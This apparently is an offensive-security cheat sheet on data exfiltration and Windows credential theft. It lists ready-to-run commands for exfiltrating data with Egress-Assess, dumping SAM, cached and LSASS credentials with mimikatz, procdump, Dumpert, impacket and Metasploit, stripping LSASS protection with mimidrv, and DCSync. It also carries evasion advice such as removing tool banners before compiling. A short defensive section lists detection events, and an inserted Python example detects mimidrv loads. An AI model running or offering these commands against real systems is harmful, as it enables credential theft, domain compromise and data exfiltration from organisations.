Data Mining - Exfiltration

Exfiltration

https://github.com/FortyNorthSecurity/Egress-Assess
HTTP(S) - DNS - FTP

./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> -Username <username> -Password <password> -Datatype ssn

Find interesting files

PowerView

Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]

NetNTLMv1 hash of the current user

https://github.com/eladshamir/Internal-Monologue

Credentials

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves it holds the credentials but never sends them to the server, so they are not present in the server's memory.
Non-network logon (Interactive, NetworkCleartext, ...): the client sends the credentials to the service, so they are held in lsass.exe.

SAM

reg.exe save hklm\sam <C:\temp\sam>
reg.exe save hklm\system <C:\temp\system>
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

Cache

reg.exe save hklm\security <C:\temp\security>
reg.exe save hklm\system <C:\temp\system>
lsadump::cache
run post/windows/gather/cachedump

LSASS

LSASS is protected - Mimidrv

https://posts.specterops.io/mimidrv-in-depth-4d273d19e148

If LSASS is protected (Full WinTcb), Mimidrv can be used to add or remove process protection; loading the driver requires SeLoadDriverPrivilege.

It installs a service via advapi32!CreateService and grants the Everyone group access to that service.

Do not forget to clean up after yourself!

Windows Event ID 7045 & 4697 - Service Creation
- Service Name: “mimikatz driver (mimidrv)”
- Service File Name: *\mimidrv.sys
- Service Type: kernel mode driver (0x1)
- Service Start Type: auto start (2)

Event ID 4697 records the account that installed the driver service. The Audit Security System Extension subcategory must be enabled via Group Policy for this event to be generated.

Sysmon Event ID 11 - File Creation
- TargetFilename: *\mimidrv.sys

Sysmon Event ID 6 - Driver Loaded
- ImageLoaded: *\mimidrv.sys
- SignatureStatus: Expired
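As an added defender-side example (not code from this page or from any tool it links), the following Python applies the four indicators listed above to constructed sample events and correlates them per host, so that a file write, service install and driver load on the same machine surface as one confirmed incident. The newline-delimited JSON shape and the lower-case field names are assumptions modelled on the Windows/Sysmon field names named on the page.

```python
"""Detection logic for the Mimidrv artifacts listed above (Windows Event IDs
7045/4697, Sysmon Event IDs 11/6).

Added example, not code from the page or from any linked tool. The events are
CONSTRUCTED samples in an assumed newline-delimited JSON shape such as a log
forwarder might emit; the lower-case field names are assumptions modelled on
the Windows/Sysmon field names given on the page.
"""
import json

# Indicators taken from the page: the service name Mimidrv registers and the
# wildcard path *\mimidrv.sys (any directory, file name mimidrv.sys).
SERVICE_NAME = "mimikatz driver (mimidrv)"
DRIVER_SUFFIX = "\\mimidrv.sys"

# Constructed telemetry (raw string, so the JSON "\\" escapes reach json.loads
# unchanged): one benign service install, then the four Mimidrv artifacts.
SAMPLE_EVENTS = r"""
{"host": "WS01", "channel": "System", "event_id": 7045, "service_name": "Vendor Updater", "image_path": "C:\\Program Files\\Vendor\\upd.exe", "service_type": "user mode service (0x10)", "start_type": "auto start (2)"}
{"host": "WS01", "channel": "Sysmon", "event_id": 11, "image": "C:\\Users\\alice\\tools\\mk.exe", "target_filename": "C:\\Users\\alice\\tools\\mimidrv.sys"}
{"host": "WS01", "channel": "System", "event_id": 7045, "service_name": "mimikatz driver (mimidrv)", "image_path": "C:\\Users\\alice\\tools\\mimidrv.sys", "service_type": "kernel mode driver (0x1)", "start_type": "auto start (2)"}
{"host": "WS01", "channel": "Security", "event_id": 4697, "subject_user": "CORP\\alice", "service_name": "mimidrv", "service_file_name": "C:\\Users\\alice\\tools\\mimidrv.sys"}
{"host": "WS01", "channel": "Sysmon", "event_id": 6, "image_loaded": "C:\\Users\\alice\\tools\\mimidrv.sys", "signature_status": "Expired"}
"""


def is_driver_path(path):
    """True when a path matches the page's wildcard indicator (any path ending in mimidrv.sys)."""
    return (path or "").lower().endswith(DRIVER_SUFFIX)


def match_event(ev):
    """Return (rule, severity) for an event that matches one of the page's
    indicators, or None for anything else."""
    channel, eid = ev.get("channel"), ev.get("event_id")
    if channel == "System" and eid == 7045:
        # Service creation: either the well-known service name or the driver path.
        if ev.get("service_name") == SERVICE_NAME or is_driver_path(ev.get("image_path")):
            return ("7045: mimidrv service installed", "high")
    elif channel == "Security" and eid == 4697:
        # Only logged when the Audit Security System Extension subcategory is
        # enabled; this is the event that names the account behind the install.
        if is_driver_path(ev.get("service_file_name")):
            return ("4697: mimidrv service installed by " + ev.get("subject_user", "?"), "high")
    elif channel == "Sysmon" and eid == 11:
        if is_driver_path(ev.get("target_filename")):
            return ("Sysmon 11: mimidrv.sys written to disk", "medium")
    elif channel == "Sysmon" and eid == 6:
        if is_driver_path(ev.get("image_loaded")):
            # The page notes the driver's signature status shows as Expired.
            sev = "critical" if ev.get("signature_status") == "Expired" else "high"
            return ("Sysmon 6: mimidrv.sys loaded into the kernel", sev)
    return None


def scan(raw):
    """Parse newline-delimited JSON events and return one alert dict per hit."""
    alerts = []
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        hit = match_event(ev)
        if hit is not None:
            alerts.append({"host": ev["host"], "channel": ev["channel"],
                           "event_id": ev["event_id"], "rule": hit[0], "severity": hit[1]})
    return alerts


# The three stages that together confirm a driver load rather than a stray file.
LOAD_CHAIN = {("Sysmon", 11), ("System", 7045), ("Sysmon", 6)}


def confirmed_loads(alerts):
    """Map host -> True when that host shows file write, service install and
    driver load, so the analyst sees one confirmed incident instead of four alerts."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["host"], set()).add((a["channel"], a["event_id"]))
    return {host: LOAD_CHAIN <= stages for host, stages in seen.items()}


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a['severity']}] {a['host']} {a['rule']}")
    print("confirmed driver loads:", confirmed_loads(found))
```

The benign 7045 record is deliberately left unmatched: matching on the service name alone would miss a renamed service, and matching on every kernel-mode driver install would be too noisy, so the rule keys on the page's two concrete indicators (service name and file name) and relies on the per-host correlation to raise confidence.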

!+
!processProtect /process:mimikatz.exe

LSASS is not protected

SafetyKatz.exe

Remove banners before compilation: https://github.com/outflanknl/Dumpert
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump
procdump.exe -accepteula -ma lsass.exe dump.dmp
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
-----
sekurlsa::logonPasswords full
-----
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
-----
load kiwi
creds_all
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]

DCSync
lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]